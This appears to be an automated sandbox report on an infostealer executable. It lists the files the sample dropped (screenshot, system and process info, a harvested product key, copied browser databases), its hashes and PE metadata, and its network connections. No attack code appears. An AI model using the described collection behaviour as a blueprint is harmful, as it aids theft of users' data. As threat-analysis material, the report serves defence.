19:18:43..IDENTIFYING NUMBER: {90160000-00E2-0409-0000-0000000FF1CE}...APP: Microsoft InfoPath MUI (English) 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 09/02/2023 19:18:43..IDENTIFYING NUMBER: {90160000-0044-0409-0000-0000000FF1CE}...APP: M

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\System\Desktop.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	83886
Entropy (8bit):	7.895678649384247
Encrypted:	false
SSDEEP:	1536:CQZFvdwFeh2GJn5MNcRCXztYUKmSZKXQoHmJLYhJ2KlaLoW8dpoY1WN+as3rke6D:dvdwIh2GgaRLKAoHm5s0k/W8dk+33rk3
MD5:	9A9CE4AD2CB1296BE5E04BDBF185178B
SHA1:	4D000C8C42C52B9B5BF65F98701EB9F3A75FEA19
SHA-256:	D3043375684291EB36986178BE5C317BFDFCA4CF614C17A6C1D7A3D5FD03EE95
SHA-512:	B373C7CB8A12D35207F4D6CA6010DDA61147F26FC71AA638516A647FC59C3D03ECB1BE26F03A25E267A004432DE0488BC07D62AA603C66CA23E1F7C06AF34963
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\System\Info.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	514
Entropy (8bit):	5.432262847167802
Encrypted:	false
SSDEEP:	12:RFqnjwPRbVkb21C2YH/VqjNszJxWW/v5Xyl:3ywP/kbvRHdqjNQJxWWZI
MD5:	842DD50FBA24EFB8B0D542AC67E6B9A4
SHA1:	5D881A7E73BFA519B8AD3B22E9B9E2DC12A7B6D8
SHA-256:	EC4502AFE69976E0845EEB25730F48EF0D4EDB0EC3114F4A27CF5A594647602D
SHA-512:	4EB1EFA636878C41FEB22C65F39B343CF13B6D94D6B8BB2BE1E44A89C7A588CA07167D69CE27B6BFBA2FFC49556CD7539E0DB0AEB98D1816E2DDE6D4DF5CBF4B
Malicious:	false
Preview:	.[IP].External IP: 102.129.143.53.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 585948.System: Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: UO_18EH4.RAM: 4095MB.DATE: 2022-06-21 2:49:10 PM.SCREEN: 1280x1024.BATTERY: NoSystemBattery (1%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Debugger: False.Processe: False.Hosting: True.Antivirus: Windows Defender..

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\System\Process.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8973
Entropy (8bit):	5.583051550287712
Encrypted:	false
SSDEEP:	192:82k0kl4ksokNkkOOkszJk/2lkXIkR2kJdkR6kkATakT5kmnkXbk67I2k4rtotAtO:7kJ/t7OTaJUcSwO
MD5:	C181BAAFC9B63F91707EDD4C57FD7228
SHA1:	3CDF5B33746EBFDEE3B4EAD7B003E0EDA6015901
SHA-256:	D561A5F6F6ABE561061AB708ABAA31FF362CDD852FF207C2FE7D17D7396D740D
SHA-512:	6575163A8BB8A35236AF57C74A9D9B0DA89B3056773CDE9172F21FB70A1D1DAF493BA69C0EA7D5DF9774DBB80A4052DA4F1F20FCDA1EF3942B7D384EB9CE64D6
Malicious:	false
Preview:	NAME: dwm..PID: 984..EXE: C:\Windows\system32\dwm.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..PID: 5908..EXE: C:\Program Files (x86)\nVKMPiepBfUodHrjgROPBPhZuzSMXRURtrqhbrNHcvvDHYKKvJbwLS\nFhPETuspZPKFSIJvTczaYAZRyfwzu.exe..NAME: svchost..PID: 1376..EXE: c:\windows\system32\svchost.exe..NAME: RuntimeBroker..PID: 4724..EXE: C:\Windows\System32\RuntimeBroker.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..PID: 3144..EXE: C:\Program Files (x86)\nVKMPiepBfUodHrjgROPBPhZuzSMXRURtrqhbrNHcvvDHYKKvJbwLS\nFhPETuspZPKFSIJvTczaYAZRyfwzu.exe..NAME: svchost..PID: 1764..EXE: C:\Windows\system32\svchost.exe..NAME: svchost..PID: 5896..EXE: c:\windows\system32\svchost.exe..NAME: dllhost..PID: 2332..EXE: C:\Windows\system32\DllHost.exe..NAME: svchost..PID: 2596..EXE: c:\windows\system32\svchost.exe..NAME: spoolsv..PID: 1952..EXE: C:\Windows\System32\spoolsv.exe..NAME: svchost..PID: 1360..EXE: c:\windows\system32\svchost.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..PID: 5784..EXE: C:\Program Files (x86)\nVKMPiep

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\System\ProductKey.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.004364184708143
Encrypted:	false
SSDEEP:	3:LI6IEzu/m:86IEz/
MD5:	F0B2BC985E8E58A74DCDA21312837E95
SHA1:	0127BF68AAA0CCFF928424B12045538C6032E647
SHA-256:	18B68885C3A63A3A607770CA72C2E0CCB5FC5685C371E0A144C97B277FEAF878
SHA-512:	9D58A1A0699E2EAE0E72C2A0F8CC96D8E447A1E036B1B1503E7ACBCEE7E2382D2250C2A321D8EC281BDB3AB528A1AF6ECA2A3D7E31CEC69EABADF7C70464188F
Malicious:	false
Preview:	PJN2H-BJQ73-7RWVJ-KYPRG-Y2H8C

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\System\Windows.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3294
Entropy (8bit):	5.712521018498004
Encrypted:	false
SSDEEP:	96:vBkXLkX3kXskXDkXpkXakXWkXLkXxkXKkXPkkXpkX+kXUkXEkXxkXFkf:vBkXLkX3kXskXDkXpkXakXWkXLkXxkXY
MD5:	AD928053B5FBE72081E2EB844BCF42CF
SHA1:	76F53344E796E9175725F9E1E387F0BAB6E6C359
SHA-256:	662E3D0DBE6D4CFB1F75DEA28B83B3A7792E838710F0E1FFA09149E455D7FC90
SHA-512:	4F457A125E4DE50D51521241215776BF9F4D02250A3D1E99423A50B77334F6CBC570DA20BEDAE21FC543793E611280D9A43BE154208F747E429EE386F8619ECC
Malicious:	false
Preview:	NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..TITLE: Chrome..PID: 5908..EXE: C:\Program Files (x86)\nVKMPiepBfUodHrjgROPBPhZuzSMXRURtrqhbrNHcvvDHYKKvJbwLS\nFhPETuspZPKFSIJvTczaYAZRyfwzu.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..TITLE: Chrome..PID: 3144..EXE: C:\Program Files (x86)\nVKMPiepBfUodHrjgROPBPhZuzSMXRURtrqhbrNHcvvDHYKKvJbwLS\nFhPETuspZPKFSIJvTczaYAZRyfwzu.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..TITLE: Chrome..PID: 5784..EXE: C:\Program Files (x86)\nVKMPiepBfUodHrjgROPBPhZuzSMXRURtrqhbrNHcvvDHYKKvJbwLS\nFhPETuspZPKFSIJvTczaYAZRyfwzu.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..TITLE: Chrome..PID: 5888..EXE: C:\Program Files (x86)\nVKMPiepBfUodHrjgROPBPhZuzSMXRURtrqhbrNHcvvDHYKKvJbwLS\nFhPETuspZPKFSIJvTczaYAZRyfwzu.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..TITLE: Chrome..PID: 2932..EXE: C:\Program Files (x86)\nVKMPiepBfUodHrjgROPBPhZuzSMXRURtrqhbrNHcvvDHYKKvJbwLS\nFhPETuspZPKFSIJvTczaYAZRyfwzu.exe..NAME: nFhPETuspZPKFSIJvTczaYAZRyfwzu..TITLE: Chrome..PID: 5584..EXE: C:\Program Files

C:\Users\user\AppData\Local\Temp\tmpCF58.tmp.dat

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD68D.tmp.dat

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDD06.tmp.dat

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE3AE.tmp.dat

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	0.45897271081743474
Encrypted:	false
SSDEEP:	96:/8WU+bDoYysX0uhnydVjN9DLjGQLBE3u:El+bDo3irhnydVj3XBBE3u
MD5:	48A0503A55113CE8C8D7A1481A465D49
SHA1:	6212FF680FA492983973EEF5341BDD2AC5B28417
SHA-256:	E79639510991FEBA97C39F0388B53420765D307C46C43B0BD0C014FD36EF8092
SHA-512:	96A2FC52E2325A29F4B38A080DA817DA741A38BB8DBFD2A85349608251197D3D715A75639FB587216C5BAF8034A93F33E11DA7E35C70347BF584DAC94EF889CF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE95C.tmp.dat

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	0.45897271081743474
Encrypted:	false
SSDEEP:	96:/8WU+bDoYysX0uhnydVjN9DLjGQLBE3u:El+bDo3irhnydVj3XBBE3u
MD5:	48A0503A55113CE8C8D7A1481A465D49
SHA1:	6212FF680FA492983973EEF5341BDD2AC5B28417
SHA-256:	E79639510991FEBA97C39F0388B53420765D307C46C43B0BD0C014FD36EF8092
SHA-512:	96A2FC52E2325A29F4B38A080DA817DA741A38BB8DBFD2A85349608251197D3D715A75639FB587216C5BAF8034A93F33E11DA7E35C70347BF584DAC94EF889CF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF861.tmp.dat

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.932184086162508
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	build (2).exe
File size:	1569792
MD5:	7565784c6e2cca725b1cdd88200186fc
SHA1:	4e40bde881e956d839dfb2093df296ceb84336c1
SHA256:	de4c002d5b5981476ecd950c93a32496008a865c9e72d3e0ad63b218a858beae
SHA512:	4b7cbe462cff8f4e40e28271a188d1a0cef3ef81e6fbe0471ab293eb17f0b91dd73be91783d159a7d3e01b1b20de4992680b85ee0fead0449c8a98641887b0cb
SSDEEP:	24576:ce3i2Q9NXw2/wPOjdGxYqfw+Jwz/S/6RZs8nVW6k5JHkARt7DBAqnH:NSTq24GjdGSgw+W7SCRnVQTEQ/BA8
TLSH:	16751298B3E90A04F3FF6FB8ECF110549671F9179811D64E2889205D0F36B4AAD61B7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W............."...0.................. ........@.. .......................@............`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x57fb9e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8E8BD757 [Fri Oct 13 17:41:43 2045 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17fb44	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x180000	0x1228	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x182000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x17fb28	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x17dba4	0x17dc00	False	0.9395778333742633	data	7.936175202761423	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x180000	0x1228	0x1400	False	0.356640625	data	4.831832948002838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x182000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x180090	0x348	data
RT_MANIFEST	0x1803e8	0xe3b	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 21, 2022 14:49:16.399600983 CEST	49756	80	192.168.2.4	208.95.112.1
Jun 21, 2022 14:49:16.429449081 CEST	80	49756	208.95.112.1	192.168.2.4
Jun 21, 2022 14:49:16.429560900 CEST	49756	80	192.168.2.4	208.95.112.1
Jun 21, 2022 14:49:16.430543900 CEST	49756	80	192.168.2.4	208.95.112.1
Jun 21, 2022 14:49:16.460993052 CEST	80	49756	208.95.112.1	192.168.2.4
Jun 21, 2022 14:49:16.489288092 CEST	80	49756	208.95.112.1	192.168.2.4
Jun 21, 2022 14:49:16.581662893 CEST	49756	80	192.168.2.4	208.95.112.1
Jun 21, 2022 14:49:17.664509058 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:17.664546013 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:17.664618969 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:17.847676992 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:17.847728014 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:17.898797989 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:17.898936987 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:17.901956081 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:17.901976109 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:17.902318954 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:18.081788063 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:20.478902102 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:20.520503044 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:20.636276007 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:20.636560917 CEST	443	49757	162.159.136.232	192.168.2.4
Jun 21, 2022 14:49:20.636735916 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:20.656863928 CEST	49757	443	192.168.2.4	162.159.136.232
Jun 21, 2022 14:49:34.168557882 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:49:34.185312986 CEST	80	49758	104.18.115.97	192.168.2.4
Jun 21, 2022 14:49:34.187104940 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:49:34.187495947 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:49:34.204351902 CEST	80	49758	104.18.115.97	192.168.2.4
Jun 21, 2022 14:49:34.244321108 CEST	80	49758	104.18.115.97	192.168.2.4
Jun 21, 2022 14:49:34.317548037 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:49:35.120369911 CEST	49756	80	192.168.2.4	208.95.112.1
Jun 21, 2022 14:49:35.150897980 CEST	80	49756	208.95.112.1	192.168.2.4
Jun 21, 2022 14:49:35.192663908 CEST	49756	80	192.168.2.4	208.95.112.1
Jun 21, 2022 14:50:37.352879047 CEST	80	49756	208.95.112.1	192.168.2.4
Jun 21, 2022 14:50:37.353024960 CEST	49756	80	192.168.2.4	208.95.112.1
Jun 21, 2022 14:50:47.849333048 CEST	80	49756	208.95.112.1	192.168.2.4
Jun 21, 2022 14:51:05.833832979 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:05.850850105 CEST	80	49758	104.18.115.97	192.168.2.4
Jun 21, 2022 14:51:05.859699965 CEST	80	49758	104.18.115.97	192.168.2.4
Jun 21, 2022 14:51:06.028630018 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:08.862257004 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:08.862294912 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:08.862370968 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:08.863106012 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:08.863118887 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:08.968686104 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:08.968849897 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:08.987642050 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:08.987673998 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:08.987984896 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:08.993230104 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:09.040491104 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:09.145423889 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:09.145494938 CEST	443	49806	151.80.29.83	192.168.2.4
Jun 21, 2022 14:51:09.146528006 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:09.147455931 CEST	49806	443	192.168.2.4	151.80.29.83
Jun 21, 2022 14:51:16.025249958 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:16.047904015 CEST	49826	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:16.053332090 CEST	80	49758	104.18.115.97	192.168.2.4
Jun 21, 2022 14:51:16.053499937 CEST	49758	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:16.065476894 CEST	80	49826	104.18.115.97	192.168.2.4
Jun 21, 2022 14:51:16.066059113 CEST	49826	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:16.066304922 CEST	49826	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:16.083067894 CEST	80	49826	104.18.115.97	192.168.2.4
Jun 21, 2022 14:51:16.099504948 CEST	80	49826	104.18.115.97	192.168.2.4
Jun 21, 2022 14:51:16.154464006 CEST	49826	80	192.168.2.4	104.18.115.97
Jun 21, 2022 14:51:22.477962971 CEST	49826	80	192.168.2.4	104.18.115.97

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 21, 2022 14:49:16.344219923 CEST	64454	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:49:16.373553038 CEST	53	64454	8.8.8.8	192.168.2.4
Jun 21, 2022 14:49:17.640181065 CEST	60506	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:49:17.663284063 CEST	53	60506	8.8.8.8	192.168.2.4
Jun 21, 2022 14:49:34.097254038 CEST	64277	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:49:34.118717909 CEST	53	64277	8.8.8.8	192.168.2.4
Jun 21, 2022 14:49:34.342349052 CEST	56076	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:49:34.363188028 CEST	53	56076	8.8.8.8	192.168.2.4
Jun 21, 2022 14:51:08.786809921 CEST	52472	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:51:08.817276001 CEST	53	52472	8.8.8.8	192.168.2.4
Jun 21, 2022 14:51:08.824876070 CEST	50061	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:51:08.857049942 CEST	53	50061	8.8.8.8	192.168.2.4
Jun 21, 2022 14:51:15.505135059 CEST	50800	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:51:15.524329901 CEST	53	50800	8.8.8.8	192.168.2.4
Jun 21, 2022 14:51:15.983131886 CEST	52256	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:51:16.002511024 CEST	53	52256	8.8.8.8	192.168.2.4
Jun 21, 2022 14:51:16.026577950 CEST	61081	53	192.168.2.4	8.8.8.8
Jun 21, 2022 14:51:16.046427965 CEST	53	61081	8.8.8.8	192.168.2.4
